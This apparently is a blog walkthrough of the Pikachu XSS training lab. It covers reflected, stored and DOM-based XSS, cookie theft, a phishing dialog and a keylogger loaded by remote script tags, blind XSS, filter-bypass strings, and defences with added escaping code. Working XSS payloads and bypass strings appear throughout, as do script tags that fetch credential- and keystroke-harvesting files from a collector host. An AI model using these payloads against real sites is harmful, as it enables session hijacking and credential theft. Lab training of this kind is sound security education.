Pikachu-XSS (cross-site scripting) vulnerability

Reflected XSS (GET):

  1. Confirm that the page has an XSS vulnerability. Enter the special characters ' " <> 6666 and click Submit to see whether any of them are filtered out. The returned result is shown below.

  2. View the page source and search for the characters just entered, ' " <> 6666. They are output unchanged inside a p tag, which suggests that if we enter JS code it will also be placed, unmodified, inside the p tag.

  3. Enter JS. First test whether the input is executed as JS (an alert box): enter <script>alert('xss')</script>, and the browser executes it.

  4. View the source code: the payload we entered is embedded inside the p tag, which is exactly where it can run as JS.

  5. Refresh the page: the data entered before is gone, so no alert box appears. This is reflected XSS.

  6. Enter the payload <script>alert(1)</script> and click Submit: an alert pops up. The form is submitted via GET.

  GET-type XSS is easier to exploit; the usual approach is to send the target a disguised URL carrying the cross-site script. POST-type XSS is submitted through a form, so it cannot be exploited directly through a URL.

 Stored XSS:

  Stored XSS arises for the same reason as reflected XSS, except that the script injected by the attacker is stored in the back end together with the data, causing more lasting damage; stored XSS is therefore also called "persistent" XSS.

  1. Open the stored XSS page, a message board.

  2. Write a message on the message board and click Submit. The message appears on the page, and it does not disappear when the page is refreshed. In other words, the submitted message is stored in the back-end database.

  3. Test whether the interface has an XSS vulnerability. Enter the special characters ' " <> ? & 6666 and click Submit: the special characters are displayed on the page as a message.

  4. View the source code: the string of special characters is also embedded inside a p tag, without any filtering, processing or escaping.

  5. Next, enter a simple JS test script (an alert) and submit. The input is sent to the back end, stored, and then rendered on the front end, where the alert appears (see figure). This means the message just entered has been stored in the database.

  6. Each time the page is refreshed, the XSS alert pops up again. Because the JS script in the message is stored in the database, every visit to the page triggers it.

DOM-based XSS:

  The DOM can be understood as a standard programming interface for accessing HTML.

  1. Open the DOM-based XSS page in Pikachu.

  2. Enter a character and click "click me": an English sentence appears.

  3. View the source.

  4. Determine whether an XSS vulnerability exists. Construct a closing payload (one that closes the existing attribute and tag), #' onclick="alert(111)">, enter it on the page and click Submit.

  5. Click the "what do you see?" link below: an alert box pops up. This shows that a DOM-based XSS vulnerability exists.

  DOM-based XSS arises because the input is obtained by the DOM on the front end, processed by DOM operations, and then output through the DOM on the front end, with no interaction with the back end.

DOM-based XSS-X:

  1. Open the next DOM-based XSS page. Enter something at the prompt and submit: a sentence is shown.

  2. View the page source. The input is taken from the browser's URL, so the injection point is a URL parameter.

  3. Next, construct the closing payload. The same #' onclick="alert(111)"> works, because the output is again inside an a tag. Enter the closing payload and submit: the sentence appears, but clicking it does not pop an alert yet.

  4. Click the sentence that appears, and another sentence appears.

  5. Click this sentence, and the alert pops up on the second click.

  6. Review the source code.

XSS cookie theft:

  GET-type XSS exploitation: obtaining the cookie

  1. Uses the reflected XSS (GET) page. The goal is to obtain the local cookie and send it back to the XSS back end.

  2. Enter the payload shown in the image above and click Submit.

  3. View the XSS back end: the cookie information has been obtained. The back end records the cookie corresponding to 127.0.0.1, together with the referer and user-agent information.

  POST-type XSS exploitation: obtaining the cookie (the POST method is not submitted through the URL)

  1. A page that automatically submits a POST form (code analysis): when a user accesses this page, it automatically submits a POST request to the vulnerable site.

  2. The login page.

  3. Simulated malicious site: http://127.0.0.1/post.html (two virtual machines can be used to simulate this). Clicking the link to enter it indicates that the attack is complete and the cookie value has been obtained.

XSS phishing case: phishing attack via stored XSS

  1. The payload can be embedded in any stored XSS page that reaches the back end. Embed <script src="http://127.0.0.1/pikachu-master/pkxss/xfish/fish.php"></script> in the page; each time a user visits it, the page executes this JS and then requests the remote file fish.php.

  2. After that, simply visiting the page pops up the dialog shown in the figure; as soon as the user enters an account and password, they are sent back to the collecting file.

XSS keylogger: stored XSS

  Cross-domain:

Cross-domain - same-origin policy:

  For security reasons, all browsers have agreed on the "same-origin policy", which stipulates that JS cannot be used to interoperate between two different domains. Concretely, JS under the x.com domain cannot operate on objects in the y.com domain. Cross-domain access requires special configuration by the administrator.

  1. Code analysis.

  2. On a page with stored XSS, output a call to a remote JS file: enter <script src="http://127.0.0.1/pikachu-master/pkxss/rkeypress/rk.js"></script> in the message board and click Submit. This code is now embedded in the page.

  3. Open the console and type a few keys on the page: the page echoes that the request failed, because of the same-origin policy. But the receiving back end is our own, so it is configured to allow access from anyone; reopen the stored XSS page and type a few digits. The JS records all of our input, and the captured keystrokes show up in the XSS back end.

XSS blind injection (盲打):

  XSS blind injection is an attack scenario. "Blind" means that the attacker does not know where the submitted data will be displayed in the back end; the attacker inserts XSS exploit code with a real attack function (usually a script tag that loads a remote JS file) into the submitted data. If the back end does not filter the submitted data, the XSS is triggered when the back-office staff view it, achieving the "real attack function" the attacker prepared.

  Cookie theft: by blind-injecting a script, the administrator's information can be obtained.

  1. Open the blind XSS page in Pikachu. We see the page contents.

  2. To see how the content is presented, enter some data and observe the result. After submitting, the page shows only the words in the box. Whatever we enter is not displayed on the front page but submitted to the back end, and a front-end user cannot see the contents of our input. This is blind XSS.

  3. Enter a JS statement that produces an alert and submit. The alert does not appear on the front page, but in the back end.

  4. Simulate the administrator logging in to the back end. Click the tip on the page, and the back-end address is shown.

  5. Log in at the back-end address.

  6. On the back-end page, enter a username and password and log in. After logging in, the alert appears, because the cross-site script executes in the administrator's page. This is blind XSS.

XSS bypasses:

Filter bypass - transformation:

  • Front-end restrictions are bypassed by capturing the request and replaying it directly, or by modifying the front-end HTML code;
  • Case variation, for example: <SCRIPT>aLeRT(111)</sCRIpt>;
  • Splicing: <scri<script>pt>alert(111)</scri</script>pt>;
  • Comment interference: <scri<!--test-->pt>alert(111)</sc<!--test-->ript>;

Filter bypass - encoding:

  The core idea: the back end filters special characters such as the <script> tag, but the tag can be encoded in many ways, and the back end will not necessarily filter all of them. When the browser recognises the encoding, it decodes it back into a normal tag, which then executes.

  Note that the encoding used must be one that is correctly recognised and decoded at the output point.

  1. Open the XSS filter page in Pikachu.

  2. Enter a string of special characters on the page, such as <script> ' " ; 66666, and click Submit.

  3. View the page source. The <script> tag just entered is gone; only the part circled in the figure remains. The back end may have filtered the <script> tag we entered.

  4. Verify the filter further by trying a mixed-case bypass. Enter <ScRiPT>alert(111)</ScRIPT>: an alert box appears. This shows that the back end filters only the lowercase script tag.

  5. Because the filter targets the lowercase <script> tag, an img tag can also be used. Enter <img src=x onerror="alert(1111)">: the alert appears.

 XSS bypass of htmlspecialchars:

  About the htmlspecialchars() function:

  1. Open the XSS htmlspecialchars page in Pikachu.

  2. Enter a random string and submit to see how the back end processes it. Enter 11111 ' " <> &

  3. Check the source code to see how the back end handles this string. < > and " have been encoded, but ' has not.

  4. So construct a test payload such as q'onclick='alert(1111)' and click Submit.

  5. Click the framed part of the image above: the alert appears.
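Added example, not code from Pikachu or the original post: it puts the filter-bypass section and the htmlspecialchars section side by side, showing that a keyword blacklist lets the listed inputs through while entity escaping neutralises them, and that escaping a single-quoted attribute also needs ENT_QUOTES (PHP's htmlspecialchars() only encodes the single quote by default from PHP 8.1 on). The blacklist function is an assumption standing in for the lab's unseen filter.

```javascript
// Added example, not code from Pikachu or the original post. It contrasts the two
// server-side approaches the sections above discuss: a keyword blacklist, which the
// listed bypass inputs defeat, and htmlspecialchars()-style escaping, which in turn
// needs ENT_QUOTES when the output point sits inside a single-quoted attribute.

// A blacklist that strips only the lowercase <script> tag. Assumption: the lab's
// actual filter is not shown on the page; this stands in for it.
function blacklistFilter(str) {
  return str.replace(/<script>/g, "").replace(/<\/script>/g, "");
}

// Emulates PHP htmlspecialchars(). With ENT_COMPAT (the default before PHP 8.1)
// the single quote is left alone; ENT_QUOTES encodes it as well.
function htmlspecialchars(str, flags = "ENT_COMPAT") {
  const out = str.replace(/&/g, "&amp;").replace(/</g, "&lt;")
                 .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
  return flags === "ENT_QUOTES" ? out.replace(/'/g, "&#039;") : out;
}

// Crude check: does the markup still contain a <script> tag or a tag with an on*
// event handler (case-insensitive), i.e. something a browser would run in an
// HTML body context?
function containsActiveMarkup(html) {
  return /<script\b/i.test(html) || /<\w+[^>]*\bon\w+\s*=/i.test(html);
}

// The bypass inputs listed above: mixed case, tag splicing, and a non-script tag.
const BYPASS_INPUTS = [
  "<SCRIPT>aLeRT(111)</sCRIpt>",
  "<scri<script>pt>alert(111)</scri</script>pt>",
  '<img src=x onerror="alert(1111)">',
];

// Number of inputs that survive a given defence in executable form.
function survivors(defence) {
  return BYPASS_INPUTS.filter((p) => containsActiveMarkup(defence(p))).length;
}

// The htmlspecialchars lab's output point: input lands in a single-quoted href.
function renderLink(userInput, flags) {
  return "<a href='" + htmlspecialchars(userInput, flags) + "'>what do you see?</a>";
}

// True when the value stayed inside its quotes and no extra attribute was added.
function hrefIntact(html) {
  return /^<a href='[^']*'>what do you see\?<\/a>$/.test(html);
}
```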

Common XSS precautions:

  General principle: filter input and escape output.

  • Filtering: filter according to business requirements; for example, if an input point expects a phone number, allow only digits.
  • Escaping: all data output to the front end is escaped according to its output point; HTML output gets HTML entity escaping, and output into JS gets JS escaping.

XSS with href output:

  1. Enter the payload javascript:alert(111), which contains no special characters, and submit.

  2. View the page source.

  3. Click the text that appears on the page: the alert pops up. This is because the output is inside the href attribute of an a tag, where the javascript: protocol can be used to execute JS.

  4. Defending this href output point: allow only http and https, and then apply htmlspecialchars.

 XSS with JS output: the output point is inside JS

How to fix an XSS issue at a JS output point:

  If HTML entity encoding is used, the XSS problem is solved, but the entity-encoded content is not interpreted by JS, which breaks the front-end functionality. Therefore, special characters at a JS output point should be escaped with \ instead.

  1. Enter random characters: 111111.

  2. View the source code. What is the output if you enter tmac, and what otherwise?

   3. Enter tmac. The output is shown in the picture below.

  4. Construct the closing payload x'</script><script>alert('xss')</script>: the XSS alert executes.
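Added example, not code from Pikachu or the original post: output-point encoders for the href section (allow only http/https, then escape) and the JS output section (backslash escaping instead of entity encoding) above, with a round-trip check showing the front end still receives the original value. The script template `var input = '...'` is an assumption standing in for the lab's own script.

```javascript
// Added example, not code from Pikachu or the original post: output-point encoders
// for the href attribute and the JS string contexts discussed above, plus a
// round-trip check. The script template `var input = '...'` is an assumption
// standing in for the lab's own script.

// Escaping for a double-quoted attribute value.
function attrEscape(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// href output point. Entity encoding does not stop javascript:, so parse the value
// with the WHATWG URL parser first (like a browser it trims whitespace, drops tabs
// and newlines and lowercases the scheme), keep only http/https, then escape.
// Returns null for anything else, including relative URLs.
function safeHref(value) {
  let url;
  try { url = new URL(value); } catch (e) { return null; }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  return attrEscape(url.href);
}

// JS string output point. Entity encoding would leave a literal &#039; inside the
// script (the breakage described above), so backslash-escape instead. Encoding
// < > and / as \xNN also means the value can never contain a literal </script>.
function jsStringEscape(value) {
  return value.replace(/[\\'"<>\/\r\n\u2028\u2029]/g, (c) => {
    const hex = c.charCodeAt(0).toString(16);
    return hex.length <= 2 ? "\\x" + hex.padStart(2, "0")
                           : "\\u" + hex.padStart(4, "0");
  });
}

// Hypothetical script block in the style of the lab's JS output point.
function renderScript(value) {
  return "<script>var input = '" + jsStringEscape(value) + "';</script>";
}

// Evaluates the escaped literal to confirm the front end still receives the
// original value, which is exactly what entity encoding would break.
function roundTrip(value) {
  return new Function("return '" + jsStringEscape(value) + "';")();
}
```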

 


Source: www.cnblogs.com/mxm0117/p/12601326.html